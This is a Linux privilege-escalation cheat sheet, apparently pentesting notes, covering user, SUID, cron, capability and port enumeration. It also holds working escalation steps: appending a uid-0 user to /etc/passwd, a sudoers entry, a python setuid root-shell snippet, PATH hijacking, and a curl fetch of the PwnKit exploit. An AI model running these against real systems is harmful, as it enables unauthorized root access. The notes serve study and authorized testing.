Enumeration

Manual Enumeration

ID

When gaining initial access to a target, one of the first things we should identify is the user context. We can use the id command to gather user context information

id

There are some groups that are vulnerable: Linux Groups Privilege Escalation

Users

Enumerate the users and try to access to them

ls /home
cat /etc/passwd

Bash History

For every user, check the bash history

cat .bash_history

Sudoers

sudo -l

We can use https://gtfobins.github.io/gtfobins

SUID Privileges

We can use find to search for SUID-marked binaries.

find / -perm -u=s -type f 2>/dev/null

Once we find one go to https://gtfobins.github.io/.

Read binaries

strings <path_to_binary>

Abuse of incorrectly implemented permissions

We can use find to identify files with insecure permissions.

Searching directories writable by the user

find / -writable -type d 2>/dev/null

The following command will look for files (and not symlinks etc) that are writable.

find / -not -type l -perm -o+w

One-Liner to find directories and files

find / \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
-perm -o+w \( -type f -o -type d \) -print 2>/dev/null | xargs -r ls -ld --color=always

Abusing Password Authentication

openssl passwd <PASSWORD>

# DES crypt
mkpasswd -m des <password> -s

echo "root2:<password>:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

Add users to /etc/sudoers

user ALL=(ALL:ALL) ALL 

Files belonging the user

find / -user user -o group user 2>/dev/null

Processes

We can list system processes (including those run by privileged users) with the ps command.

ps aux

Enumerate local ports

Finally, we can display active network connections and listening ports using either netstat or ss, both of which accept the same arguments.

ss -anp
netstat -tnlp
netstat -na -p tcp

If we detect ports that we don't detected initially we should forward the port to our machine and check what is inside.

Cron Jobs

The Linux-based job scheduler is known as cron. Scheduled tasks are listed under the /etc/cron.* directories, where * represents the frequency at which the task will run.

ls -lah /etc/cron*
grep "CRON" /var/log/syslog

It is worth noting that system administrators often add their own scheduled tasks in the /etc/crontab file.

crontab -l
sudo crontab -l

Computer Information

To see the linux version and the kernel put the commands:

cat /etc/issue
cat /etc/os-release
uname -a
lsb_release -a

We can use the linux exploit suggester tool

Network

ip a
routel

Identifying Common Applications

To list applications installed by dpkg on our Debian system

dpkg -l

Listing filesystems

cat /etc/fstab
mount

View disks

findmnt
lsblk
fdisk -l

Mount a folder with the disk contents

mkdir -p /mnt/tmp
mount /dev/xvda1 /mnt/tmp

Detection and Explotation of Capabilities

/usr/sbin/getcap -r / 2>/dev/null

Potential Escalate Privileges capabilities

cap_dac_read

Allows us to read any file from the system

cap_setuid

Allow us to change the uid of the user

EXAMPLE

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

With this capability in python 3.8 we can create a python file for changing our id and open a shell:

import os
os.setuid(0)  # Switch to root user
os.system('/bin/bash')  # Spawn a root shell

motd.legal-displayed

If you find this file, there is a exploit for privesc: https://www.exploit-db.com/exploits/14339

Path Hijacking

$PATH is an environment variable that tells the system where to look for executables when you run a command without specifying its full path.

echo $PATH

Example output:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Each directory is separated by :. The system searches these directories from left to right when executing commands.

Look for external commands without absolute paths. For example using tar instead of /usr/bin/tar in a script.

Modifying $PATH

You can add new directories at the beginning of $PATH to prioritize them:

export PATH="/tmp:$PATH"

Now, if an executable called tarexists in /tmp, it will run before the system's default tar.

Pkexec

Check if pkexec exists

which pkexec && ls -l $(which pkexec)

Check the package version

dpkg -l policykit-1 2>/dev/null | grep '^ii'

If the version was built before Jan 25, 2022, it’s likely vulnerable.

Exploit

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

Automated Tools

• http://pentestmonkey.net/tools/audit/unix-privesc-check

• https://github.com/rebootuser/LinEnum

• https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS